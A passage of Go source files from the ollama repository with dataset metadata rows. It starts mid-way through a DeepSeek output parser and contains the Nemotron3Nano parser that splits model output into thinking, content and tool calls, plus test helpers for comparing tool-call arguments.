deepseekEventContent{content: contentBefore}) } return events, true default: // otherwise its content p.buffer.Reset() if len(bufStr) > 0 { events = append(events, deepseekEventContent{content: bufStr}) } return events, false } case DeepSeekCollectingToolCalls: if idx := strings.Index(bufStr, deepseekToolCallBeginTag); idx != -1 { startIdx := idx + len(deepseekToolCallBeginTag) if endIdx := strings.Index(bufStr[startIdx:], deepseekToolCallEndTag); endIdx != -1 { toolCallContent := bufStr[startIdx : startIdx+endIdx] if toolCall, err := p.parseToolCallContent(toolCallContent); err == nil { remaining := bufStr[startIdx+endIdx+len(deepseekToolCallEndTag):] remaining = strings.TrimLeftFunc(remaining, unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(remaining) events = append(events, deepseekEventToolCall{toolCall: toolCall}) return events, true } else { slog.Warn("deepseek tool call parsing failed", "error", err) } } } if idx := strings.Index(bufStr, deepseekToolCallsEndTag); idx != -1 { remaining := bufStr[idx+len(deepseekToolCallsEndTag):] remaining = strings.TrimLeftFunc(remaining, unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(remaining) p.state = DeepSeekCollectingContent return events, true } return events, false case DeepSeekCollectingToolOutput: if idx := strings.Index(bufStr, deepseekToolOutputEndTag); idx != -1 { toolOutputContent := bufStr[:idx] remaining := bufStr[idx+len(deepseekToolOutputEndTag):] // Don't trim whitespace - preserve spaces after tool output tags p.buffer.Reset() p.buffer.WriteString(remaining) p.state = DeepSeekCollectingContent if len(toolOutputContent) > 0 { events = append(events, deepseekEventContent{content: toolOutputContent}) } return events, true } return events, false } return events, false } func (p *DeepSeek3Parser) parseToolCallContent(content string) (api.ToolCall, error) { // Expected format: tool_name<|tool▁sep|>{args} parts := strings.SplitN(content, deepseekToolSepTag, 2) if len(parts) < 2 { return api.ToolCall{}, errors.New("invalid format") } toolName := strings.TrimSpace(parts[0]) argsJSON := strings.TrimSpace(parts[1]) var args api.ToolCallFunctionArguments if err := json.Unmarshal([]byte(argsJSON), &args); err != nil { return api.ToolCall{}, err } return api.ToolCall{ Function: api.ToolCallFunction{ Name: toolName, Arguments: args, }, }, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/nemotron3nano.go
model/parsers/nemotron3nano.go
package parsers import ( "regexp" "strings" "unicode" "github.com/ollama/ollama/api" ) type Nemotron3NanoParserState int const ( Nemotron3NanoCollectingThinking Nemotron3NanoParserState = iota Nemotron3NanoSkipWhitespaceAfterThinking Nemotron3NanoCollectingContent Nemotron3NanoCollectingToolCalls ) const ( nemotronThinkClose = "</think>" nemotronToolCallOpen = "<tool_call>" nemotronToolCallClose = "</tool_call>" ) type Nemotron3NanoParser struct { state Nemotron3NanoParserState buffer strings.Builder tools []api.Tool } func (p *Nemotron3NanoParser) HasToolSupport() bool { return true } func (p *Nemotron3NanoParser) HasThinkingSupport() bool { return true } func (p *Nemotron3NanoParser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool { p.tools = tools // thinking is enabled if user requests it thinkingEnabled := thinkValue != nil && thinkValue.Bool() prefill := lastMessage != nil && lastMessage.Role == "assistant" if !thinkingEnabled { p.state = Nemotron3NanoCollectingContent return tools } if prefill && lastMessage.Content != "" { p.state = Nemotron3NanoCollectingContent return tools } p.state = Nemotron3NanoCollectingThinking return tools } type nemotronEvent interface { isNemotronEvent() } type nemotronEventThinkingContent struct { content string } type nemotronEventContent struct { content string } type nemotronEventToolCall struct { toolCall api.ToolCall } func (nemotronEventThinkingContent) isNemotronEvent() {} func (nemotronEventContent) isNemotronEvent() {} func (nemotronEventToolCall) isNemotronEvent() {} func (p *Nemotron3NanoParser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) { p.buffer.WriteString(s) events := p.parseEvents() var toolCalls []api.ToolCall var contentSb strings.Builder var thinkingSb strings.Builder for _, event := range events { switch event := event.(type) { case nemotronEventToolCall: toolCalls = append(toolCalls, event.toolCall) case nemotronEventThinkingContent: thinkingSb.WriteString(event.content) case nemotronEventContent: contentSb.WriteString(event.content) } } return contentSb.String(), thinkingSb.String(), toolCalls, nil } func (p *Nemotron3NanoParser) parseEvents() []nemotronEvent { var all []nemotronEvent keepLooping := true for keepLooping { var events []nemotronEvent events, keepLooping = p.eat() if len(events) > 0 { all = append(all, events...) } } return all } // emitWithPartialCheck extracts unambiguous content before a potential partial tag func (p *Nemotron3NanoParser) emitWithPartialCheck(bufStr, tag string) (unambiguous, ambiguous string) { if overlapLen := overlap(bufStr, tag); overlapLen > 0 { beforePartialTag := bufStr[:len(bufStr)-overlapLen] trailingLen := trailingWhitespaceLen(beforePartialTag) return bufStr[:len(beforePartialTag)-trailingLen], bufStr[len(beforePartialTag)-trailingLen:] } wsLen := trailingWhitespaceLen(bufStr) return bufStr[:len(bufStr)-wsLen], bufStr[len(bufStr)-wsLen:] } func (p *Nemotron3NanoParser) eat() ([]nemotronEvent, bool) { bufStr := p.buffer.String() if bufStr == "" { return nil, false } switch p.state { case Nemotron3NanoCollectingThinking: if strings.Contains(bufStr, nemotronThinkClose) { split := strings.SplitN(bufStr, nemotronThinkClose, 2) thinking := strings.TrimRightFunc(split[0], unicode.IsSpace) p.buffer.Reset() remainder := strings.TrimLeftFunc(split[1], unicode.IsSpace) p.buffer.WriteString(remainder) // Transition to whitespace-skipping state if buffer is empty, // otherwise go directly to content collection if remainder == "" { p.state = Nemotron3NanoSkipWhitespaceAfterThinking } else { p.state = Nemotron3NanoCollectingContent } if thinking != "" { return []nemotronEvent{nemotronEventThinkingContent{content: thinking}}, true } return nil, true } unambig, ambig := p.emitWithPartialCheck(bufStr, nemotronThinkClose) p.buffer.Reset() p.buffer.WriteString(ambig) if unambig != "" { return []nemotronEvent{nemotronEventThinkingContent{content: unambig}}, false } return nil, false // We only want to skip whitespace between thinking and content case Nemotron3NanoSkipWhitespaceAfterThinking: bufStr = strings.TrimLeftFunc(bufStr, unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(bufStr) if bufStr == "" { return nil, false } p.state = Nemotron3NanoCollectingContent return nil, true case Nemotron3NanoCollectingContent: if strings.Contains(bufStr, nemotronToolCallOpen) { split := strings.SplitN(bufStr, nemotronToolCallOpen, 2) content := strings.TrimRightFunc(split[0], unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(split[1]) p.state = Nemotron3NanoCollectingToolCalls if content != "" { return []nemotronEvent{nemotronEventContent{content: content}}, true } return nil, true } unambig, ambig := p.emitWithPartialCheck(bufStr, nemotronToolCallOpen) p.buffer.Reset() p.buffer.WriteString(ambig) if unambig != "" { return []nemotronEvent{nemotronEventContent{content: unambig}}, false } return nil, false case Nemotron3NanoCollectingToolCalls: if strings.Contains(bufStr, nemotronToolCallClose) { split := strings.SplitN(bufStr, nemotronToolCallClose, 2) remaining := strings.TrimLeftFunc(split[1], unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(remaining) var events []nemotronEvent if tc, err := p.parseToolCall(split[0]); err == nil { events = append(events, nemotronEventToolCall{toolCall: tc}) } if !strings.Contains(remaining, nemotronToolCallOpen) { p.state = Nemotron3NanoCollectingContent } return events, true } return nil, false } return nil, false } var ( nemotronFunctionRegex = regexp.MustCompile(`<function=([^>]+)>`) nemotronParameterRegex = regexp.MustCompile(`<parameter=([^>]+)>\n?([\s\S]*?)\n?</parameter>`) ) func (p *Nemotron3NanoParser) parseToolCall(content string) (api.ToolCall, error) { toolCall := api.ToolCall{} // Extract function name fnMatch := nemotronFunctionRegex.FindStringSubmatch(content) if len(fnMatch) < 2 { return toolCall, nil } toolCall.Function.Name = fnMatch[1] // Extract parameters toolCall.Function.Arguments = api.NewToolCallFunctionArguments() paramMatches := nemotronParameterRegex.FindAllStringSubmatch(content, -1) for _, match := range paramMatches { if len(match) >= 3 { paramName := match[1] paramValue := strings.TrimSpace(match[2]) // Try to parse as typed value based on tool definition toolCall.Function.Arguments.Set(paramName, p.parseParamValue(paramName, paramValue)) } } return toolCall, nil } func (p *Nemotron3NanoParser) parseParamValue(paramName string, raw string) any { // Find the matching tool to get parameter type var paramType api.PropertyType for _, tool := range p.tools { if tool.Function.Parameters.Properties != nil { if prop, ok := tool.Function.Parameters.Properties.Get(paramName); ok { paramType = prop.Type break } } } return parseValue(raw, paramType) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/testhelpers_test.go
model/parsers/testhelpers_test.go
package parsers import ( "encoding/json" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) // argsComparer provides cmp options for comparing ToolCallFunctionArguments // It compares by logical equality (same keys with same values) not by order var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool { // Convert both to maps and compare aMap := a.ToMap() bMap := b.ToMap() if len(aMap) != len(bMap) { return false } for k, av := range aMap { bv, ok := bMap[k] if !ok { return false } // Use JSON encoding for deep comparison of values aJSON, _ := json.Marshal(av) bJSON, _ := json.Marshal(bv) if string(aJSON) != string(bJSON) { return false } } return true }) // propsComparer provides cmp options for comparing ToolPropertiesMap var propsComparer = cmp.Comparer(func(a, b *api.ToolPropertiesMap) bool { if a == nil && b == nil { return true } if a == nil || b == nil { return false } aJSON, _ := json.Marshal(a) bJSON, _ := json.Marshal(b) return string(aJSON) == string(bJSON) }) // toolsComparer combines argsComparer and propsComparer for comparing tools var toolsComparer = cmp.Options{argsComparer, propsComparer} // toolCallEqual compares two tool calls by comparing their components // It compares arguments by logical equality (same keys with same values) not by order func toolCallEqual(a, b api.ToolCall) bool { if a.ID != b.ID { return false } if a.Function.Index != b.Function.Index { return false } if a.Function.Name != b.Function.Name { return false } // Compare arguments by logical equality using argsComparer logic aMap := a.Function.Arguments.ToMap() bMap := b.Function.Arguments.ToMap() if len(aMap) != len(bMap) { return false } for k, av := range aMap { bv, ok := bMap[k] if !ok { return false } aJSON, _ := json.Marshal(av) bJSON, _ := json.Marshal(bv) if string(aJSON) != string(bJSON) { return false } } return true } // testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved) func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap { props := api.NewToolPropertiesMap() for k, v := range m { props.Set(k, v) } return props } // testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved) func testArgs(m map[string]any) api.ToolCallFunctionArguments { args := api.NewToolCallFunctionArguments() for k, v := range m { args.Set(k, v) } return args }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false